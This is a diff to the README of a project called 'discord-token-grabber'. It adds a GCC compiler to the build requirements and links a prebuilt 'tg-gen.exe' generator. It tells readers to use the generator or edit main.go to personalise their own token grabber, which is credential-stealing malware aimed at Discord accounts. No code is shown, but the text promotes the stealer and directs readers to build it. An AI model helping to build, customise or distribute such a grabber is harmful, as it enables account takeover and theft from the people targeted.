pedrokpp/discord-token-grabber/README.md

 ![sampleimage](./assets/image.png "Pretty cool, huh?")

 ## Requirements
-You need to have [Go](https://golang.org/doc/install) installed in your computer
+You need to have [Go](https://golang.org/doc/install) installed in your computer and probably a [GCC compiler](https://osdn.net/projects/mingw/releases/)

+If need must have at least Go installed in order to edit ``main.go`` with the information needed

 ## Warning
 Use the [generator](https://github.com/pedrokpp/discord-token-grabber/releases/download/2.0/tg-gen.exe) or edit ``main.go`` in order to personalize your own token grabber